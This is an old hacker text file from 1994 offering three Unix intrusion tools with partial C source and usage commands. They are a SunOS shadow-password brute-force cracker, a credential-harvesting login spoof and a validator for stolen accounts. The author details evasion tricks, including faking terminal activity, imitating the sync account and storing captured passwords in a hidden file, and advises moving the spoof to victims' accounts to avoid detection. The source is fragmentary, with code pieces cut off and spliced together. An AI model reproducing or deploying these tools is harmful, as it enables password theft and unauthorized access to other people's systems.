***********************************
* Unix Hacking Tools of the Trade *
* *
* By *
* *
* The Shining/UPi (UK Division) *
***********************************
Disclaimer :
The following text is for educational purposes only and I strongly suggest
that it is not used for malicious purposes....yeah right!
Introduction :
Ok, I decided to release this phile to help out all you guys who wish to
start hacking unix. Although these programs should compile & run
on your system if you follow the instructions I have given, knowing a bit
of C will come in handy if things go wrong. Other docs I suggest you read
are older 'phrack' issues with shooting sharks various articles on unix,
and of course, 'Unix from the ground up' by The Prophet.
This article includes three programs, a SUNOS Brute force Shadow password
file cracker, The Ultimate Login Spoof, and a Unix Account Validator.
Shadow Crack
------------
SUNOS Unix brute force shadow password file cracker
---------------------------------------------------
Well, a while back, I saw an article in phrack which included a brute force
password cracker for unix. This was a nice idea, except that these days
more and more systems are moving towards the shadow password scheme. This,
for those of you who are new to unix, involves storing the actual encrypted
passwords in a different file, usually only accessible to root. A typical
entry from a System V R4 password file looks like this :-
root:x:0:1:Sys. admin:/:/bin/sh
with the actual encrypted password replaced by an 'x' in the /etc/passwd
file. The encrypted password is stored in a file(in the case of sysV)
called /etc/shadow which has roughly the following format :-
root:XyfgFekj95Fpq:::::
this includes the login i.d., the encrypted password, and various other
fields which hold info on password ageing etc...(no entry in the other
fields indicate they are disabled).
Now this was fine as long as we stayed away from system V's, but now a
whole load of other companies have jumped on the bandwagon from IBM (aix)
to Suns SUNOS systems. The system I will be dealing with is SUNOS's
shadowed system. Now, like sysV, SUNOS also have a system whereby the
actual encrypted passwords are stored in a file usually called
/etc/security/passwd.adjunct, and normally this is accessible only by root.
This rules out the use of brute force crackers, like the one in phrack
quite a while back, and also modern day programs like CRACK. A typical
/etc/passwd file entry on shadowed SUNOS systems looks like this :-
root:##root:0:1:System Administrator:/:/bin/csh
with the 'shadow' password file taking roughly the same format as that of
Sys V, usually with some extra fields.
However, we cannot use a program like CRACK, but SUNOS also supplied a
function called pwdauth(), which basically takes two arguments, a login
name and decrypted password, which is then encrypted and compared to the
appropriate entry in the shadow file, thus if it matches, we have a valid
i.d. & password, if not, we don't.
I therefore decided to write a program which would exploit this function,
and could be used to get valid i.d's and passwords even on a shadowed
system!
To my knowledge the use of the pwdauth() function is not logged, but I could
be wrong. I have left it running for a while on the system I use and it has
attracted no attention, and the administrator knows his shit. I have seen
the functions getspwent() and getspwnam() in Sys V to manipulate the
shadow password file, but not a function like pwdauth() that will actually
validate the i.d. and password. If such a function does exist on other
shadowed systems then this program could be very easily modified to work
without problems.
The only real beef I have about this program is that because the
pwdauth() function uses the standard unix crypt() function to encrypt the
supplied password, it is very slow!!! Even in burst mode, a password file
with 1000's of users could take a while to get through. My advice is
to run it in the background and direct all its screen output to /dev/null
like so :-
shcrack -mf -uroot -ddict1 > /dev/null &
Then you can log out then come back and check on it later!
The program works in a number of modes, all of which I will describe below,
is command line driven, and can be used to crack both multiple accounts in
the password file and single accounts specified. It is also NIS/NFS (Sun
Yellow Pages) compatible.
-mb Burst mode, this scans the password file, trying the minimum number
of password guessing strategies on every account.
-mi Mini-burst mode, this also scans the password file, and tries most
password guessing strategies on every account.
-mf Brute-force mode, tries all password strategies, including the use
of words from a dictionary, on a single account specified.
more about these modes in a sec, the other options are :-
-p[password file] This is the password file you wish to use, if this is
left unspecified, the default is /etc/passwd.
NB: The program automatically detects and uses the
password file wherever it may be in NIS/NFS systems.
-u[user id] The login i.d. of the account you wish to crack, this is used
in Brute-force single user mode.
-d[dict file] This uses the words in a dictionary file to generate
possible passwords for use in single user brute force
mode. If no filename is specified, the program only uses the
password guessing strategies without using the dictionary.
Modes
^^^^^
-mb Burst mode basically gets each account from the appropriate password
file and uses two methods to guess its password. Firstly, it uses the
account name as a password, this name is then reversed and tried as a
possible password. This may seem like a weak strategy, but remember,
the users passwords are already shadowed, and therefore are deemed to
be secure. This can lead to sloppy passwords being used, and I have
came across many cases where the user has used his/her i.d. as a
password.
-mi Mini-burst mode uses a number of other password generating methods
as well as the 2 listed in burst mode. One of the methods involves
taking the login i.d. of the account being cracked, and appending the
numbers 0 to 9 to the end of it to generate possible passwords. If
this mode has no luck, it then uses the accounts gecos 'comment'
information from the password file, splitting it into words and
trying these as passwords. Each word from the comment field is also
reversed and tried as a possible password.
-mf Brute-force single user mode uses all the above techniques for password
guessing as well as using a dictionary file to provide possible
passwords to crack a single account specified. If no dictionary filename
is given, this mode operates on the single account using the
same methods as mini-burst mode, without the dictionary.
Using shadow crack
------------------
To get program help from the command line just type :-
$ shcrack <RETURN>
which will show you all the modes of operation.
If you wanted to crack just the account 'root', located in
/etc/passwd(or elsewhere on NFS/NIS systems), using all methods
including a dictionary file called 'dict1', you would do :-
$ shcrack -mf -uroot -ddict1
to do the above without using the dictionary file, do :-
$ shcrack -mf -uroot
or to do the above but in password file 'miner' do :-
$ shcrack -mf -pminer -uroot
to start cracking all accounts in /etc/passwd, using minimum password
strategies do :-
$ shcrack -mb
to do the above but on a password file called 'miner' in your home
directory do :-
$ shcrack -mb -pminer
to start cracking all accounts in 'miner', using all strategies except
dictionary words do :-
/* Mini-burst mode, try above combinations as well as other strategies
which include adding numbers to the end of the user i.d. to generate
passwords or using the comment field information in the password
file */
/* Takes the user name as its argument and then generates possible
passwords by adding the numbers 0-9 to the end. If the username
is greater than 7 characters, don't bother */
if (c == 'n') {
if (buff[0] != ' ')
try_word(buff);
strcpy(buff, "");
}
}
fclose(fp);
}
/* Process the word to be used as a password by stripping n from
it if necessary, then use the pwdauth() function, with the login
name and word to attempt to get a valid id & password */
void try_word( char pw[] )
{
int pwstat, i, pwlength;
char temp[2], buff[WORDSIZE];
Well this subject has been covered many times before but its a while since
I have seen a good one, and anyway I thought other unix spoofs have had two
main problems :-
1) They were pretty easy to detect when running
2) They recorded any only shit entered.....
Well now I feel these problems have been solved with the spoof below.
Firstly, I want to say that no matter how many times spoofing is deemed as
a 'lame' activity, I think it is very underestimated.
When writing this I have considered every possible feature such a program
should have. The main ones are :-
1) To validate the entered login i.d. by searching for it in the
password file.
2) Once validated, to get all information about the account entered
including - real name etc from the comment field, homedir info
(e.g. /homedir/miner) and the shell the account is using and
store all this in a file.
3) To keep the spoofs tty idle time to 0, thus not to arouse the
administrators suspicions.
4) To validates passwords before storing them, on all unshadowed unix systems
& SUNOS shadowed/unshadowed systems.
5) To emulates the 'sync' dummy account, thus making it act like the
real login program.
6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
quit if it has not grabbed an account within a specified time.
7) To automatically detect & display the hostname before the login prompt
e.g. 'ccu login:', this feature can be disabled if desired.
8) To run continuously until a valid i.d. & valid password are entered.
As well as the above features, I also added a few more to make the spoof
'foolproof'. At university, a lot of the users have been 'stung' by
login spoofs in the past, and so have become very conscious about security.
For example, they now try and get around spoofs by entering any old crap when
prompted for their login name, or to hit return a few times, to prevent any
'crappy' spoofs which may be running. This is where my spoof shines!,
firstly if someone was to enter -
login: dhfhfhfhryr
Password:
into the spoof, it checks to see if the login i.d. entered is
valid by searching for it in the password file. If it exists, the
spoof then tries to validate the password. If both the i.d. & password
are valid, these will be stored in a file called .data, along with
additional information about the account taken directly from the password
file.
Now if, as in the case above, either the login name or password is
incorrect, the information is discarded, and the login spoof runs again,
waiting for a valid user i.d. & password to be entered.
Also, a lot of systems these days have an unpassworded account called
'sync', which when logged onto, usually displays the date & time the
sync account was last logged into, and from which server or tty,
the message of the day, syncs the disk, and then logs you straight out.
A few people have decided that the best way to dodge login spoofs is to
first login to this account then when they are automatically logged out,
to login to their own account.
They do this firstly, so that if a spoof is running it only records the
details of the sync account and secondly the spoof would not act as the
normal unix login program would, and therefore they would spot it and report
it, thus landing you in the shit with the system administrator.
However, I got around this problem so that when someone
tries to login as sync (or another account of a similar type, which you can
define), it acts exactly like the normal login program would, right down to
displaying the system date & time as well as the message of the day!!
The idle time facility
----------------------
One of the main problems with unix spoofs, is they can be spotted
so easily by the administrator, as he/she could get a list of current
users on the system and see that an account was logged on, and had been
idle for maybe 30 minutes. They would then investigate & the spoof
would be discovered.
I have therefore incorporated a scheme in the spoof whereby
approx. every minute, the tty the spoof is executed from, is 'touched'
with the current time, this effectively simulates terminal activity &
keeps the terminals idle time to zero, which helps the spoofs chances
of not being discovered greatly.
The spoof also incorporates a routine which will automatically
keep track of approximately how long the spoof has been running, and if
it has been running for a specified time without grabbing an i.d. or password,
will automatically exit and run the real login program.
This timer is by default set to 12.5 minutes, but you can alter this time
if you wish.
Note: Due to the varying processing power of some systems, I could not
set the timer to exactly 60 seconds, I have therefore set it to 50,
incase it loses or gains extra time. Take this into consideration when
setting the spoofs timer to your own value. I recommend you
stick with the default, and under no circumstances let it run
for hours.
The spoof basically uses 2 methods of password validation(or none at
all on a shadowed system V). Firstly, when the spoof is used on any unix
with an unshadowed password file, it uses the crypt function to validate a
password entered. If however the system is running SUNOS 4.1.+ and
incorporates the shadow password system, the program uses a function called
pwdauth(). This takes the login i.d. & decrypted password as its arguments
and checks to see if both are valid by encrypting the password and
comparing it to the shadowed password file which is usually located in
/etc/security and accessible only by root. By validating both the i.d. &
password we ensure that the data which is saved to file is correct and not
any old bullshit typed at the terminal!!!
Executing the Spoof
-------------------
ok, now about the program. This is written in ANSI-C, so I hope you have a
compatible compiler, GCC or suns ACC should do it. Now the only time you
will need to change to the code is in the following circumstances :-
1) If you are to compile & run it on an unshadowed unix,
in which case remove all references to the pwdauth() function,
from both the declarations & the shadow checking routine, add
this code in place of the shadow password checking routine :-
2) Add the above code also to the spoof if you are running this on a system
V which is shadowed. In this case the spoof loses its ability to
validate the password, to my knowledge there is no sysV equivalent
of the pwdauth() function.
Everything else should be pretty much compatible. You should have no
problems compiling & running this on an unshadowed SUNOS machine, if
you do, make the necessary changes as above, but it compiled ok
on every unshadowed SUNOS I tested it on. The Spoof should
automatically detect whether a SUNOS system is shadowed or unshadowed
and run the appropriate code to deal with each situation.
Note: when you have compiled this spoof, you MUST 'exec' it from the
current shell for it to work, you must also only have one shell
running. e.g. from C or Bourne shell using the GNU C Compiler do :-
$ gcc spoof.c -o spoof
$ exec spoof
This replaces the current shell with the spoof, so when the spoof quits &
runs the real login program, the hackers account is effectively logged off.
/* Program : Unix login spoof
Author : The Shining/UPi (UK Division)
Date : Released 12/4/94
Unix Type : All unshadowed unix systems &
shadowed SUNOS systems
Note : This file MUST be exec'd from the shell. */
#define OUTFILE ".data" /* Data file to save account info into */
#define LOGPATH "/usr/bin/login" /* Path of real login program */
#define DUMMYID "sync" /* Dummy account on your system */
#define DLENGTH 4 /* Length of dummy account name */
FILE *fp;
/* Set up variables to store system time & date */
time_t now;
static int time_out, time_on, no_message, loop_cnt;
/* Set up a structure to store users information */
/* Initialise main program variables to 0, change 'loop_cnt' to 1
if you do not want the machines host name to appear with
the login prompt! (e.g. prompt is `login:` instead of
'MIT login:' etc) */
wait = 3; /* Holds value for pause */
flag = 0; /* Spoof ends if value is 1 */
loop_cnt = 0; /* Change this to 1 if no host required */
time_out = 0; /* Stops timer if spoof has been used */
time_on = 0; /* Holds minutes spoof has been running */
disable_interrupts(); /* Call function to disable Interrupts */
/* Get system time & date and store in log_date, this is
displayed when someone logs in as 'sync' */
while( flag == 0 )
{
invalid = 0; /* Holds 1 if id +/or pw are invalid */
shadow = 0; /* 1 if shadow scheme is in operation */
no_message = 0; /* Flag for Login Incorrect msg */
alarm(50); /* set timer going */
get_info(); /* get user i.d. & password */
/* Check to see if the user i.d. entered is 'sync', if it is
display system time & date, display message of the day and
then run the spoof again, insert the account of your
choice here, if its not sync, but remember to put
the length of the accounts name next to it! */
if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
printf("%sn", ld);
if ((fp = fopen("/etc/motd", "r")) != NULL) {
while ((motd = getc(fp)) != EOF)
putchar(motd);
/* Check if a valid user i.d. has been input, then check to see if
the password system is shadowed or unshadowed.
If both the user i.d. & password are valid, get additional info
from the password file, and store all info in a file called .data,
then exit spoof and run real login program */
setpwent(); /* Rewind pwfile to beign processing */
/* Check for shadowed password system, in SUNOS, the field in /etc/passwd
should begin with '##', in system V it could contain an 'x', if none
of these exist, it checks that the entry = 13 chars, if less then
shadow system will probably be implemented (unless acct has been
disabled) */
if ( invalid == 0 ) {
if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
shadow = 1;
else
if (strlen(pwentry->pw_passwd) < 13)
shadow = 1;
/* If unshadowed, use the salt from the pwfile field & the key to
form the encrypted password which is checked against the entry
in the password file, if it matches, then all is well, if not,
spoof runs again!! */
/* If SUNOS Shadowing is in operation, use the pwdauth() function
to validate the password, if not SUNOS, substitute this code
with the routine I gave earlier! */
/* Loop while some loser keeps hitting return when asked for user
i.d. and if someone hits CTRL-D to break out of spoof. Enter
a # at login to exit spoof. Uncomment the appropriate line(s)
below to customise the spoof to look like your system */
/* Display login incorrect only if the user hasn't logged on as
'sync' */
void invalid_login( void )
{
if ( flag == 1 && pwstat == 0 )
sleep(wait);
if ( no_message == 0 )
printf("Login incorrectn");
}
/* Displays appropriate message, exec's the real login program,
this replaces the spoof & effectively logs spoof's account off.
Note: this spoof must be exec'd from the shell to work */
then delete the source, run it and wait for some sucker to login!.
If you do initially run this spoof from your account, I suggest you
remove it when you have grabbed someone's account and run it from theirs
from then on, this reduces your chances of being caught!
User i.d. & Password Validator
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Now if you are familiar with the unix Crack program, as I'm sure most of
you are ;-), or if you have used my spoof to grab some accounts,
this little program could be of some use. Say you have snagged
quit a few accounts, and a few weeks later you wanna see if they are still
alive, instead of logging onto them, then logging out again 20 or 30 times
which can take time, and could get the system admin looking your way, this
program will continuously ask you to enter a user i.d. & password, then
validate them both by actually using the appropriate entry in the password
file. All valid accounts are then stored along with other info from the
password file, in a data file. The program loops around until you stop it.
This works on all unshadowed unix systems, and, you guessed it!, shadowed
SUNOS systems.
If you run it on an unshadowed unix other than SUNOS, remove all references
to pwdauth(), along with the shadow password file checking routine,
if your on sysV, your shit outa luck! anyway, here goes :-
/* Program : To validate accounts & passwords on both
shadowed & unshadowed unix systems.
Author : The Shining/UPi (UK Division)
Date : Released 12/4/94
UNIX type : All unshadowed systems, and SUNOS shadowed systems */
if (invalid_user == 1)
printf("User unknown/not found in password filen");
if (invalid_user == 2 )
printf("Password invalidn");
printf("nnValidate another account?(y/n): ");
scanf("%1s", ans);
endpwent();
}
}
/* Check to see if shadow password system is used, in SUNOS the field
in /etc/passwd starts with a '#', if not, check to see if entry
is 13 chars, if not shadow must be in use. */
int pw_system( void )
{
if (strlen(pwentry->pw_passwd) != 13)
return(0);
else
if (strcmp(u.salt, "##") == NULL)
return(0);
else
return(1);
}
/* If system is unshadowed, get the 2 character salt from the password
file, and use this to encrypt the password entered. This is then
compared against the password file entry. */
int unshadowed( void )
{
if (pwentry->pw_passwd == crypt(u.key, u.salt))
return(0);
else
return(1);
}
/* If SUNOS shadowe system is used, use the pwdauth() function to validate
the password stored in the /etc/security/passwd.adjunct file */
The above programs will not compile under non-ansi C compilers without quite
a bit of modification. I have tested all these programs on SUNOS both
shadowed & unshadowed, though they should work on other systems with
little modification (except the shadow password cracker, which is SUNOS
shadow system specific).
Regards to the following guys :-
Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
the guys at United International Perverts(yo Dirty Mac & Jasper!)
and all I know.